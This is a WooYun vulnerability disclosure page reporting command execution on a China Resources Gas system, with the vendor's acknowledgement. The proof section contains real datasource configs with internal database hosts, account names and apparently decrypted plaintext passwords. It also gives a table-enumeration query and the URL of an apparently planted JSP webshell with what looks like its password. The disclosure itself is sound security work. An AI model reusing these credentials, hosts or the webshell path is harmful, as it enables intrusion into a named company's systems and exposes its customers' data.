当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168271

漏洞标题:华润燃气某系统漏洞(涉及近百万工单/涉及大量维修记录以及内部信息/涉及三个数据库/探测内网)

相关厂商:华润燃气(集团)有限公司

漏洞作者: 路人甲

提交时间:2016-01-08 09:44

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

详细说明:

http://27.17.7.236 存在命令执行,通过读取配置文件发现是华润燃气郑州市,存在多个APP下载界面,通过对数据库配置,发现三个库,大量数据外泄,可入综合内网
具体情况看截图,
数据过多,只截取部分作为证明,

漏洞证明:

app.png

app1.png

111.png

out1.png

port.png

xinxi.png

xinxi1.png

xinxi2.png

xinxi3.png

xinxi4.png

xinxi5.png

xinxi6.png

xinxi7.png

xinxi8.png

xinxi9.png

xinxi10.png

<url>jdbc:oracle:thin:@172.22.3.10:1521:cisalpha</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>gas_ia</value>
      </property>
    </properties>
    <password-encrypted>{AES}EPm+fsxb8xLBgm4wLhIRlgHt0s5RVhdVafcizyuMnnA=</password-encrypted>
    <url>jdbc:oracle:thin:@172.22.3.10:1521:cisalpha</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>lspf_bpm</value>
      </property>
    </properties>
    <password-encrypted>{AES}hjOiF7aUu3IhfGyVoSfkuu9+kg+lBeMQZSBoCADmGmM=</password-encrypted> nkuB_VJ9P-KG2D
    <url>jdbc:oracle:thin:@172.22.3.10:1521:cisalpha</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>lspf_support</value>
      </property>
    </properties>
    <password-encrypted>{AES}rTG4WHhLu2aUHQ/bedLAy3Q/qqhzr++gafiJ1C9CpmI=</password-encrypted>  rkJX_8TYW-8AIJ
  <jdbc-driver-params>
    <url>jdbc:oracle:thin:@172.22.3.10:1521:cisalpha</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>bsp</value>
      </property>
    </properties>
    <password-encrypted>{AES}OnCaoqHGtt9ReKP2HQGKf8PPYGyxde8N42dX6g1JeX0=</password-encrypted>  ZUkI_T59N-RW0K

数据库配置以及解密的密码

Query#0 : select t.TABLE_NAME,t.NUM_ROWS from user_tables t order by NUM_ROWS desc
TABLE_NAME
VARCHAR2	NUM_ROWS
NUMBER
T_CS_AREA_SEARCH	 
PF_LANG	 
PF_LANG_TYPE	 
TAB_PF_DUTY_OBJECT_RELA	682000
PF_DUTY_OBJECT_RELA	318950
PF_TD_EXT_LOG	89968
PF_DUTY_OBJECT_RELA_0518	83270
PF_TD_FIRED_TRIGGERS_HIS	81765
PF_ONLINE_USER	52860
PF_OBJECT_EXTEND	52615
PF_DUTY_FUNCTION_GROUP_RELA	35630
PF_DUTY_OBJECT_RELA_ZS0325	26120
PF_FUNCTION_GROUP_OBJECT_RELA	26058
TMP_FUNCTION_GROUP_OBJECT_0516	24548
TMP_PF_DUTY_OBJECT_R	8714
PF_STAFF_ZS0505	6533
PF_ACCOUNT_0330	6195
PF_ACCOUNT_DUTY_RELA_0413	5859
PF_FUNCTION_GROUP_OBJ_RELA_ZS	5354
PF_OBJECT	4447
PF_CODE	3987
PF_DUTY_ORG_RELA	3531
PF_ACCOUNT_DUTY_RELA	3433
PF_DUTY	3425
TAB_PF_ACCOUNT_DUTY_RELA	3264
PF_ACCOUNT_DUTY_RELA_ZS0505	3258
PF_ACCOUNT_DUTY_RELA_GHF	2926
SP_LOG	2214
PF_ACCOUNT_ZS0325	2201
TAB_PF_DUTY_ORG_RELA	2188
PF_DUTY_ORG_RELA_ZS0505	2181
PF_STAFF_ORG_ORGRELATYPE_RELA	1483
PF_ORG_RELA_ZS0505	1445
PF_DUTY_0505	1344
TAB_GHF0521	1295
DUTY_GROUP_TMP	1295
TMP_DUTY_IMP	1172
TMP_PF_DUTY_FUNCTION_GROUP_R	1132
PF_ACCOUNT_INNER_ROLE_RELA	1076
PF_STAFF_ORG_ORGRELATYPE_ZS	981
PF_DUTY_ORG_RELA_GHF	960
PF_DUTY_ORG_RELA_TMP	960
TAB_DD	960
PF_ORG_ZS0505	920
PF_ORG_RELA	899
SP_QUERY_CONT_DEF_REQ_LOG	892
SP_GRID_MODEL_LOG	730
PF_FUNCTION_GROUP	716
PF_STAFF	702
TAB_PF_DUTY	674
PF_DUTY_GHF	664
PF_MENU	654
PF_ACCOUNT	634
DATAPUSH_DATA_USERS	629
PF_CODE_SORT	572
PF_MENU_BAK_20150122	525
PF_PARAM_ACCESS_LEVEL_CONTROL	522
PF_USER_PROFILE	491
PF_ORG_GHF	459
TAB_ORGTMP	457
PF_ORG_RELA_GHF	457
PF_ORG	436
SP_GRID_COL_CFG	350
SP_QUERY_PARA_DEF_REQ_LOG	325
SP_QUERY_CONT_DEF	319
PF_MSG_SEND_HISTROY	300
PF_REPORT_TYPE	249
TMP_FUNCTION_GROUP_0516	215
PF_PARAM	164
TAB_DUTY_TMP	161
TMP_PF_DUTY_ORG_R	144
TMP_PF_DUTY	144
SP_QUERY_PARA_DEF	132
PF_HOLIDAY_CODE	132
SP_QUERY_USELOG	130
PF_REPORT_SORT	129
PF_MSG_RCV	104
PF_MSG_RCV_HISTORY	90
REPORT_TEST1	89
SP_QUERY_DEF_REQ_LOG	88
PF_TD_EXT_JOB_EXHDL	82
SP_GRID_TEMPLET	81
PF_DUTY_FUNCTION_GROUP_RELA_ZS	73
PF_MSG_USERINFO	67
SP_GRID_MODEL	58
PF_TD_EXT_EXEC_CPNT	46
PF_TD_EXT_GROUP	45
PF_TD_JOB_DETAILS	44
PF_WORKDEST_SHORTCUT	44
PF_TD_EXT_JOB_DTL	44
PF_PARAM_SORT	42
PF_PASSWORD_HISTORY	42
PF_DUTY_OBJECT_EXCEPT_ZS0325	41
PF_TD_EXT_JOB_EXEC	39
PF_TD_EXT_JOB_DTL_HIS	38
PF_TD_JOB_DETAILS_HIS	38
PF_PARAM_VALUE	35
SP_QUERY_DEF	34
PF_TD_TRIGGERS	33
PF_INNER_ROLE	32
SP_QUERY_CONT_CONFIG	32
PF_TD_CRON_TRIGGERS	30
SP_QUERY_CONT_CONFIG_REQ_LOG	28
DATAPUSH_DATA	28
PF_TD_EXT_JOB_EXEC_HIS	25
PF_TD_EXT_DATA_DICT	23
PF_FUNCTION_GROUP_ZS0325	22
PF_MSG_SEND	21
PF_MSG_RCV_EXTENDGG	20
PF_TD_EXT_LISTENER	20
PF_OBJECT_EXTENDATTR	19
PF_STAFF_ERR150327	18
PF_SAFECONFIG	17
PF_DROOLS_TYPE	14
QUERY_MORE_TEST	12
PF_APPLICTION	11
PF_MSG_TYPE	11
PF_DROOLS_FORMDRL	11
PF_TD_EXT_EXEC_CPNT_HIS	10
PF_MSG_USERGROUP	10
PF_DEMO_LEAVE	10
SP_SCHEDULE	9
PF_PLATFORM	7
TAB_PF_DUTY_OBJECT_EXCEPT	7
REPORT_TEST2	6
PF_TD_CPNT_AUTH	6
PF_MSG_CONSTANT	5
PF_MSG_SORT	4
WL_SERVLET_SESSIONS	4
PF_TD_SIMPLE_TRIGGERS	3
PF_WORKDESK	3
SP_HOLIDAY	2
PF_TD_LOCKS	2
PF_MSG_USER_CONFIG	1
PF_SAFECONFIGS	1
PF_TD_EXT_LISTENER_TYPE	1
PF_DROOLS_DRLFUNC	1
PF_DROOLS_FORMVALIDATE	1
PF_TD_SCHEDULER_STATE	1
SP_QUERY_CONT_DEF_REQ	0
PF_TD_BLOB_TRIGGERS	0
SP_QUERY_DEF_ATTR	0
SP_QUERY_DEF_ATTR_REQ	0
SP_QUERY_DEF_ATTR_REQ_LOG	0
SP_QUERY_DEF_REQ	0
SP_QUERY_PARA_DEF_REQ	0
SP_QUERY_PRO	0
SP_QUERY_PRO_REQ	0
SP_QUERY_PRO_REQ_LOG	0
PF_SERVICEMANAGER_INFO	0
PF_DUTY_OBJECT_EXCEPT	0
PF_FILE_RECORD	0
PF_MSG_ATTR	0
PF_TD_FIRED_TRIGGERS	0
PF_TD_PAUSED_TRIGGER_GRPS	0
PF_TD_SIMPROP_TRIGGERS	0
PF_WORKDESK_ATTR	0
PF_OBJECT_BAK050411	0
PF_TD_CALENDARS	0
SP_QUERY_CONT_CONFIG_REQ	0

数据库表结构

http://27.17.7.236/static/2.jsp carry

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-11 11:15

厂商回复:

感谢提交

最新状态:

暂无

漏洞评价:

评价